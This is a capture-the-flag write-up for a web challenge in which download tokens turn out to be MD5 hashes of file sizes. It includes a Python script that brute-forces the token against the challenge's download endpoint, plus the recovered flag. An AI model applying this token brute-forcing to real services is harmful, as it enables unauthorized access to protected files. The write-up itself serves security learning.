Tags: web token
Rating: 4.5
# Download me..
![](https://i.imgur.com/Y8onBQf.png)
**Download me was a simple web challange.**
**We are presented with the file listing. One of the files is a flag.**
![](https://i.imgur.com/kDVTANH.png)
**It is also the only file we can't download as it is missing the token.**
![](https://i.imgur.com/4A5HJ0m.png)
**Tokens resemble some hashes so I upload them to the Crackstation for the verification. We get the confirmation for MD5 slong with the cracked values.**
![](https://i.imgur.com/1mQLNat.png)
**It turns out that the numbers corespond to the file sizes of the files. I proceed to writing a solver.**
## Solver
```
#!/usr/bin/python3
import requests
import hashlib
def main():
for i in range(1000):
payload = hashlib.md5(str(i).encode()).hexdigest()
r = requests.get(f'http://165.22.22.11:25632/download.php?file=flag.txt&token={payload}')
if 'AFFCTF' in r.content.decode('utf-8'):
print(r.content)
if __name__ == '__main__':
main()
```
## Output
```
AFFCTF{Pr3dic71bl3_t0k3n5_4r3_b4d}
```